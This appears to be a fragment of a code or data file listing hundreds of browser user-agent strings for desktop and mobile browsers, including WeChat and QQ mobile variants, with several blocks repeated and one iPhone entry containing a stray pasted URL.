'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
